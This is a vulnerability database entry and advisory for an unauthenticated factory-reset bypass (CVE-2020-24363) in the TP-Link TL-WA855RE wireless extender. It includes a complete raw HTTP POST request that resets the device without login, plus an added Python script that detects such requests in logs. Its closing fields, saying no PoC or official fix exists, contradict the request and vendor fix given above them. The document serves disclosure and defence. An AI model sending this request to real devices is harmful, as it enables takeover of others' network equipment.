TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass

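Basic fields

Vulnerability ID: SSV-99059
Disclosure/discovery date: Unknown
Submission date: 2020-11-30
Severity:
Vulnerability category: Security mode bypass
Affected component: TP-Link router (TL-WA855RE(US)_V5_200415)
Vulnerability author: Unknown
Submitter: VxerLee
CVE-ID: cve-2020-24363
CNNVD-ID: To be added
CNVD-ID: To be added
ZoomEye Dork: To be added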

Source

Vulnerability details


Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass

Date: 2020/07/29

Exploit Author: malwrforensics

Vendor Homepage: https://tp-link.com

Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip

Version: TL-WA855RE(US)_V5_200415

Tested on: N/A

CVE : 2020-24363

Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware

Details

By default, the web interface of the TL-WA855RE wireless extender requires users to log in before they can access the admin interface. However, an attacker on the same network can bypass the login and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. The attacker can then set up a new admin password, resulting in a complete takeover of the device.

To test, you can send a POST request like the one below using the TDDP_RESET code (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.

POST /?code=5&asyn=0 HTTP/1.1
Host:
Content-Length: 7
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: text/plain;charset=UTF-8
Origin: http://
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

0|1,0,0
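
An added detection example, not part of the original advisory or of any vendor code: it scans HTTP request records for POST requests that carry code=5 (TDDP_RESET) toward an extender, the request shape described above. The record layout, the IP addresses, the optional admin allowlist and the function name find_reset_requests are assumptions, and the sample records are constructed.

```python
from urllib.parse import urlsplit, parse_qs

TDDP_RESET = "5"  # reset code named in the advisory

# Constructed sample records: timestamp, client, server, method, URI.
# The field layout is an assumption, not a real sensor format.
SAMPLE_LOG = """\
2020-08-01T10:00:01Z 192.0.2.10 192.0.2.254 GET /
2020-08-01T10:00:07Z 192.0.2.10 192.0.2.254 POST /?code=2&asyn=1
2020-08-01T10:02:13Z 192.0.2.77 192.0.2.254 POST /?code=5&asyn=0
2020-08-01T10:02:40Z 192.0.2.77 192.0.2.254 POST /?asyn=0&code=%35
2020-08-01T10:03:00Z 192.0.2.10 192.0.2.1 POST /?code=5&asyn=0
malformed line
"""


def find_reset_requests(log_text, extender_ips, admin_hosts=()):
    """Return (timestamp, client) for each POST with code=5 sent to an extender."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip records that do not match the assumed layout
        ts, client, server, method, uri = fields
        if method.upper() != "POST" or server not in extender_ips:
            continue
        # parse_qs decodes percent-encoding and is independent of parameter order
        query = parse_qs(urlsplit(uri).query)
        if TDDP_RESET in query.get("code", []) and client not in admin_hosts:
            hits.append((ts, client))
    return hits


if __name__ == "__main__":
    for ts, client in find_reset_requests(SAMPLE_LOG, {"192.0.2.254"}):
        print(f"{ts} reset request to extender from {client}")
```

Because the affected firmware accepts this request without authentication, the records cannot be triaged by login state; the source address and the timing relative to a later password change are what remain to correlate.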


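PoC

No PoC available

Reference links

Solution

Temporary solution

No temporary solution available

Official solution

No official solution available

Protection measures

No protection measures available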
